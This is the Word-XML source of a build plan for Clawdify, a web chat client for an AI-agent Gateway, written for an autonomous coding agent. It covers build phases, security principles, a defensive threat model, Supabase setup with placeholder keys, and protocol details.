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X8bce0610929d3fef3e55a8d548b079c76486d81"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clawdify (formerly ClawSpace) — Detailed Build Plan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1.1 — February 3, 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Based on:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BUILD-BRIEF.md by Goat, corrected against actual Gateway protocol source code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Priority order:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Security 2. Ease of use 3. UX/UI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An autonomous AI coding agent building this from scratch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ecurity-philosophy">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Security Philosophy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">← READ THIS FIRST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="before-you-start">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Before You Start</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/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phase-0-project-scaffolding">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 0: Project Scaffolding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~1.5h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-1-authentication--database">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 1: Authentication &amp; Database</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~4h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-2-gateway-websocket-client">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 2: Gateway WebSocket Client</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~5h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-3-connection-setup-ui">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 3: Connection Setup UI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~2.5h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-4-project-spaces">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 4: Project Spaces</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~3h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-5-chat-interface">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 5: Chat Interface</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~5h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-6-streaming--chat-integration">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 6: Streaming &amp; Chat Integration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~4h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="Xf61293a9930c4c31a5380d814d67b9f40e88c72">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 7: Artifact Detection &amp; Preview Panel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~3.5h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-8-polish--edge-cases">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 8: Polish &amp; Edge Cases</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~3h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="phase-9-deploy">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 9: Deploy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(~1.5h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="dependency-graph">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Dependency Graph</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="whats-deferred-to-v11">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">What’s Deferred to V1.1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink w:anchor="security-checklist">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Security Checklist</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">← GATE EVERY PHASE AGAINST THIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="25" w:name="security-philosophy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Philosophy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Security is not a phase. It is a constraint on every line of code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ClawSpace handles gateway tokens that provide full operator access to a user’s AI agent — including shell execution, file system access, and messaging. A leaked token is a compromised machine. Treat every token like a private SSH key.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="priority-order-non-negotiable"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Priority Order (Non-Negotiable)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🔒 Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Every feature ships secure or doesn’t ship. No</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we’ll harden it later.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🎯 Ease of use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Secure defaults that don’t require a PhD to configure.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✨ UX/UI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Beautiful, but never at the expense of #1 or #2.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="core-security-principles"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Core Security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never touch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tokens stored only in Supabase (encrypted) or ephemeral memory. Device tokens are acceptable in localStorage (they are scoped, rotatable, and issued by the Gateway). User-provided gateway tokens are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 everything from the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WebSocket frame from the Gateway is parsed defensively. Unknown shapes are dropped, not passed through. Type-check before rendering.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Sanitize all rendered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messages can contain arbitrary markdown, HTML, and code. Every render path goes through</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rehype-sanitize</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. No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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">outside sandboxed iframes.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Iframe = jail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artifact previews run in sandboxed iframes with a strict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attribute and a dedicated CSP. No</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allow-same-origin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is the real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RLS policies are the ground truth for data access. Client-side checks are UX conveniences, not security boundaries. Every table has RLS. No exceptions.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Defense in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 (CSP, HSTS, X-Frame-Options) + RLS + input validation + output sanitization + auth middleware. Multiple layers, each independently sufficient.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auth state is uncertain, redirect to login. If a WS frame is malformed, drop it. If token decryption fails, require re-entry. Never fall through to an insecure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Minimal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only</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">operator.read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operator.write</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">scopes. Never</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">operator.admin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">unless explicitly needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="Xa6692f1c9faf4bd0f8109bc610cd70293e7a1f8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Threat Model (What Are We Defending Against?)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theft via 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Injected script reads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NOT in localStorage; CSP blocks inline scripts;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rehype-sanitize</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">on all 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theft via URL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Quick-connect URL with</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?token=...</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in referrer headers, browser history, server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token from URL immediately;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Referrer-Policy: no-referrer</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; token stored in memory only until saved to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Cross-site request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page triggers Supabase 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uses JWT in cookies with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; state-changing operations require authenticated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Malicious assistant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returns HTML/JS that executes in ClawSpace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rehype-sanitize</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">with strict schema; HTML previews in sandboxed iframe without</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allow-same-origin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Man-in-the-middle on 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intercepts gateway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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">wss://</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Tailscale Serve); warn visually on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ws://</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">non-localhost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Privilege escalation via RLS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crafts Supabase queries for other users’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policies on every table;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth.uid()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">checks; no service role key in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Prototype pollution /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JSON from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+ schema validation before processing; no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new Function()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="security-callout-format"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Callout Format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Throughout this plan, security decisions are marked with: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Explanation of the security decision and why it matters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you see this marker, the described behavior is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mandatory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not a suggestion.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before-you-start"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before You Start</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="study-the-control-ui-source-critical"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Study the Control UI Source (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The existing OpenClaw Control UI at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dist/control-ui/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a Vite + Lit SPA that speaks the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">exact same protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ClawSpace will use. The minified source at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dist/control-ui/assets/index-CXUONUC9.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contains the reference implementation for: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Handshake flow:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Server sends</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect.challenge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">event → client responds with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request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Device identity generation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WebCrypto keypair → fingerprint as deviceId → sign the nonce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Device token persistence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Stored per deviceId+role in localStorage, used as auth.token on reconnect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Chat events:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Listening for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frames where</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">event === "chat"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, payload matches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChatEventSchema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RPC pattern:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{type:"req", id, method, params}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ awaits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{type:"res", id, ok, payload|error}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key patterns extracted from the Control UI source:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// The Control UI uses these client IDs — we'll register our own</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GATEWAY_CLIENT_IDS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WEBCHAT_UI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"webchat-ui"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CONTROL_UI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"openclaw-control-ui"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"webchat"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etc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Modes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GATEWAY_CLIENT_MODES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WEBCHAT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"webchat"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Control UI uses this for chat</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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Control UI also uses this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 client ID must be one of the allowed values in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GatewayClientIdSchema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For ClawSpace MVP, use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"webchat-ui"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as the client ID and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"webchat"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as the mode. These are already registered in the protocol. If a custom ID is needed later, it must be added to the OpenClaw source.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="28" w:name="supabase-project-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Supabase Project Setup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hyperlink r:id="rId27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→ Create new project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note down: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Project URL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://xxxx.supabase.co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Anon Key:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(public, safe for browser)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Service Role Key:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(secret, server-only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004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Email/Password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">auth in Authentication → Providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable email confirmation for dev (Authentication → Settings → uncheck</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Enable email confirmations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="environment-variables"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.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NEXT_PUBLIC_SUPABASE_ANON_KEY=your-anon-key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPABASE_SERVICE_ROLE_KEY=your-service-role-key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Defaults (user can override in UI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NEXT_PUBLIC_DEFAULT_GATEWAY_URL=ws://localhost:18789</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="X6e8dd6b78bc2c149d53e1e6ab09225392f1054f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Key Protocol Facts (Corrections to BUILD-BRIEF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The BUILD-BRIEF contains several simplifications that would cause connection failures. Here are the actual protocol details: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Brief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via query params:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?token=...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is in the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request body:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
